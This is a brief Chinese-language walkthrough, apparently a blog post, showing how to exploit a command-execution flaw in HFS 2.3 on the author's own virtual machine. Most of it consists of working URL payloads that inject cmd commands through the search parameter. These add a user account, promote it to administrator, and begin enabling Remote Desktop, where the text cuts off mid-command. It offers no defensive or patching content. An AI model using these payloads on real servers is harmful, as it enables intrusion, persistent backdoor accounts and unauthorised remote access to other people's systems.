最近爆出了HFS(Http File Server)爆出了这个漏洞。我测使用的是HFS 2.3.0.0
我在搭建的虚拟机上运行了HFS。 把它当做是一台运行了 HFS的服务器。
现在我们查看一下 服务器(虚拟机有多少个账户) net user 指令能很好的查看
好我们利用漏洞 来增加账户!
在浏览器上键入这些地址和指令
http://192.168.1.9/?search==%00{.exec|cmd /c net user Smile Smile /add.} 这样我们就可以执行我们的CMD指令
在虚拟机上用net user查看。
这样账户就添加成功了。这样我们创建的是普通用户 的普通权限。接下来就是提权了
提升为管理员权限:
http://192.168.1.9/?search==%00{.exec|cmd /c net localgroup Administrators smile /add.}
开启3389:
http://192.168.1.9/?search==%00{.exec|cmd /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_D